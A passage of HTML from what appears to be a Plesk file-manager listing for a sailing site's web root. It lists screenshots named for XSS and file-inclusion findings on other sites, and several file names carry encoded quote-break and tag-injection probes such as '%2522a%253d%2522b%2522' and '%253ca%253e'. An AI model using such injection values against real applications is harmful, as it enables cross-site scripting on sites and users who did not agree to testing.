bin();;lon();">064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 
03:10 PM</td><td><A href="http://nosedivesailing.com/064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPG" value="1-lfi-mod.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" 
title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();">1-lfi-mod.JPG</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPGfdf080d99066333a3eca3950" value="1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="FileListSelectOnChange(this);"></td><td 
class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="return bin();;lon();">1-lfi-mod.JPGfdf080d99066333a3eca3950</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" 
onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1dac1%2522a%253d%2522b%2522064a7066601" value="1dac1%2522a%253d%2522b%2522064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick="return bin();;lon();">1dac1%2522a%253d%2522b%2522064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/1dac1%2522a%253d%2522b%2522064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_25e31e30568" value="25e31e30568" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=25e31e30568" onClick="return bin();;lon();">25e31e30568</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/25e31e30568" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=25e31e30568" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F25e31e30568" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=25e31e30568" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2a790%253ca%253e05dd7ec7ca9" value="2a790%253ca%253e05dd7ec7ca9" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick="return bin();;lon();">2a790%253ca%253e05dd7ec7ca9</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/2a790%253ca%253e05dd7ec7ca9" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2ef80%2522%2520a%253db%2520c23f52e7ba1" value="2ef80%2522%2520a%253db%2520c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick="return 
bin();;lon();">2ef80%2522%2520a%253db%2520c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/2ef80%2522%2520a%253db%2520c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpg" value="302br.net-xss-2.jpg" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A 
href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();">302br.net-xss-2.jpg</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpg" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpg" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = 
this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" value="302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="return bin();;lon();">302br.net-xss-2.jpgfdf080d93392bd957db5b4d5</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3e50b%2522%253e%253ca%253e8f0ee00628" value="3e50b%2522%253e%253ca%253e8f0ee00628" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick="return bin();;lon();">3e50b%2522%253e%253ca%253e8f0ee00628</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/3e50b%2522%253e%253ca%253e8f0ee00628" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" 
alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPG" value="3M.COM-XSS-1.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();">3M.COM-XSS-1.JPG</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" 
alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPGfdf080d921773c427dce8684" value="3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="return 
bin();;lon();">3M.COM-XSS-1.JPGfdf080d921773c427dce8684</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_673db%2522a%253d%2522b%25226c91d8a7d6d" value="673db%2522a%253d%2522b%25226c91d8a7d6d" 
onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick="return bin();;lon();">673db%2522a%253d%2522b%25226c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/673db%2522a%253d%2522b%25226c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, 
